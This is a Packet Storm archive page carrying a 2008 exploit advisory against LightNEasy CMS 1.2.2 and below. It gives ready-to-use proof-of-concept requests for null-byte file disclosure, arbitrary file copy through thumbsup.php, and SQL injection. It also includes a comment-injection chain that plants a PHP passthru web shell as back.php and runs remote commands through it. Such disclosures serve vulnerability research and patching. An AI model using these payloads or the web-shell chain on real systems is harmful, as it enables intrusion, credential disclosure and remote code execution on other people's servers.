exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

lightneasy-multi.txt

lightneasy-multi.txt
Posted Apr 16, 2008
Authored by __GiReX__ | Site girex.altervista.org

LightNEasy SQLite / no database versions 1.2.2 and below suffer from code execution, SQL injection, file disclosure, and other vulnerabilities.

tags | exploit, vulnerability, code execution, sql injection
SHA-256 | 4ae586772da13e3cd993c941d350c352d377be625415ae3185b3d5119a5dc502

lightneasy-multi.txt

Change Mirror Download
# Author:  __GiReX__
# mySite: girex.altervista.org
# Date: 14/04/08

# CMS: LightNEasy SQLite / no database <= 1.2.2
# Site: lightneasy.org

# Advisory: Multiple Remote Vulnerabilities

# Need: magic_quotes_gpc = Off
magic_quotes_gpc = On / Off for SQL Injections

######################################################################################

# Bug 1: Remote File Disclosure
# Affected: SQLite / no database

# Get the config.php into HTML (like a comment)
# Note config.php not exists in SQLite version

# PoC: [host]/[path]/LightNEasy.php?page=config.php%00

######################################################################################

# Bug 2: Arbitrary file copy and rename / Thumsup v1.12
# Affected: SQLite / no database

# This vuln is present in this extern script by Gerd Tentler that is included by default
# in LightNEasy

# Vuln Code: LightNEasy/thumbsup.php

34. if(isset($_REQUEST['image'])) $image = $_REQUEST['image'];
37. if(isset($_REQUEST['cache_dir'])) $cache_dir = $_REQUEST['cache_dir'];

407. if($image) {
if($fp = @fopen($image, 'rb')) { <==
$size = filesize($image); <== Unfortunally filesize does not accept remote files
$data = fread($fp, $size); <==
fclose($fp);

$original = "$cache_dir/img_" . md5($image . $size); <==
}
else $error = 'Could not open';
414. }

451. if(!file_exists($original)) {
if($fp = @fopen($original, 'wb')) { <==
fwrite($fp, $data, strlen($data)); <==
fclose($fp);
455. }

# Note config.php not exists in SQLite version

# PoC: [host]/[path]/LightNEasy/thumbsup.php?image=../data/config.php&cache_dir=config.txt%00

# And then get file disclosure with:

# PoC: [host]/[path]/LightNEasy/config.txt

######################################################################################

# Bug 3: Getting a Remote Command Execution
# Affected: SQLite / no database

# First of all inject PHP Code into comments.dat from $_POST['newsid'] that is not sanizated

# Vuln code: LightNEasy/runtime.php

32. if($_POST['submit']=="sendcomment") {
...
42. if(!$fp=fopen("data/comments.dat","a")) die ($langmessage[142]);
43. fwrite($fp,$_POST['newsid']."|".encode($_POST['commentname'])."|". <==
44. encode($_POST['commentemail'])."|".time()."|".encode(stripslashes($_POST['commentmessage']))."||");


# PoC: If admin has been created some news and page news exists (it can has a different name)

POST [host]/[path]/LightNEasy.php?page=news
Content-Type: application/x-www-form-urlencoded

commentname=1&commentemail=1&commentmessage=1&secCode=[CAPTCHA CODE]
&submit=sendcomment&newsid=<?php passthru($_GET['cmd']); ?>/*


# Then create a file back.php with the trick of Bug 2

# PoC: [host]/[path]/LightNEasy/thumbsup.php?image=../data/comments.dat&cache_dir=../back.php%00

# Finally send remote commands to back.php

# PoC: [host]/[path]/back.php?cmd=ls

######################################################################################

# Bug 4: Multiple Remote SQL Injections
# Affected: SQLite

# Works with magic_quotes_gpc = On / Off


# Vuln Code: /LightNEasy/lightneasy.php

237. if(isset($_GET['dlid'])) {
$result=dbquery("SELECT * FROM downloads WHERE reg=".$_GET['dlid']);


# PoC: [host]/[path]/index.php?dlid=-1 OR 1

# You can find others more SQL Injections by yourself

######################################################################################

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close